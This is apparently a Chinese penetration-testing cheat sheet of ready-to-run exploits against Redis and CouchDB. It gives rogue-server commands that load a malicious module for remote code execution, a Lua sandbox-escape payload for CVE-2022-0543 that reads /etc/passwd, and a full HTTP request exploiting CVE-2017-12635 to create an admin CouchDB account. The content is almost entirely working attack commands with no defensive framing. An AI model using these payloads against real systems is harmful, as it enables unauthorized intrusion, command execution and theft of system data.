redis

# 未授权访问-CNVD-2019-21763
https://github.com/vulhub/redis-rogue-getshell
./redis-master.py -r 目标IP -p 目标端口 -L 172.31.0.66 -P 8888 -f RedisModulesSDK/exp.so -c "cat /etc/passwd"

# Redis(<=5.0.5) RCE
https://github.com/n0b0dyCN/redis-rogue-server
./redis-rogue-server.py --rhost 172.31.0.10 --rport 11874 --lhost 127.0.0.1

# 沙箱绕过RCE-CVE-2022-0543
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd", "r"); local res = f:read("*a"); f:close(); return res' 0

couchdb

# 垂直权限绕过（CVE-2017-12635）
# 1、先创建用户
PUT http://172.31.0.10:5984/_users/org.couchdb.user:tanqidi HTTP/1.1
Host: 172.31.0.10:5984
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

{
  "type": "user",
  "name": "tanqidi",
  "roles": ["_admin"],
  "roles": [],
  "password": "tanqidi"
}

# 2、登录用户授权
http://172.31.0.10:5984/_utils/#